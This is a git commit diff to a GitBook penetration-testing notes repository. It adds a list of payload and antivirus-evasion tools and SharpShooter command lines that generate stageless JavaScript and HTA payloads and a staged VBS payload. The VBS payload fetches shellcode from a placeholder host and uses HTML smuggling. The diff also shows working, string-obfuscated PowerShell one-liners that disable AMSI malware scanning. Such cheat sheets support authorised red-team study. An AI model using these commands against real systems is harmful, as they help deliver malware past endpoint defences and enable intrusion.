GitBook: [master] 2 pages modified
parent
4bd90e6d73
commit
b4cf1b25d8
@ -204,6 +204,33 @@ https://github.com/l0ss/Grouper2
|
||||
|
||||
{% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}
|
||||
|
||||
## Other tools
|
||||
|
||||
```bash
|
||||
# Veil Framework:
|
||||
https://github.com/Veil-Framework/Veil
|
||||
|
||||
# Shellter
|
||||
https://www.shellterproject.com/download/
|
||||
|
||||
# Sharpshooter
|
||||
# https://github.com/mdsecactivebreach/SharpShooter
|
||||
# Javascript Payload Stageless:
|
||||
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
|
||||
|
||||
# Stageless HTA Payload:
|
||||
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
|
||||
|
||||
# Staged VBS:
|
||||
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
|
||||
|
||||
# Donut:
|
||||
https://github.com/TheWover/donut
|
||||
|
||||
# Vulcan
|
||||
https://github.com/praetorian-code/vulcan
|
||||
```
|
||||
|
||||
## More
|
||||
|
||||
{% embed url="https://github.com/EgeBalci/sgn" %}
|
||||
|
@ -329,7 +329,7 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||
|
||||
## AMSI bypass
|
||||
|
||||
```text
|
||||
```bash
|
||||
(old)
|
||||
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
|
||||
@ -338,5 +338,17 @@ $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
|
||||
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
|
||||
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
|
||||
$field.SetValue($null,$true)
|
||||
|
||||
|
||||
# Testing for Amsi Bypass:
|
||||
https://github.com/rasta-mouse/AmsiScanBufferBypass
|
||||
|
||||
# Amsi-Bypass-Powershell
|
||||
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
|
||||
|
||||
https://blog.f-secure.com/hunting-for-amsi-bypasses/
|
||||
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
|
||||
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
|
||||
https://slaeryan.github.io/posts/falcon-zero-alpha.html
|
||||
```
|
||||
|
||||
|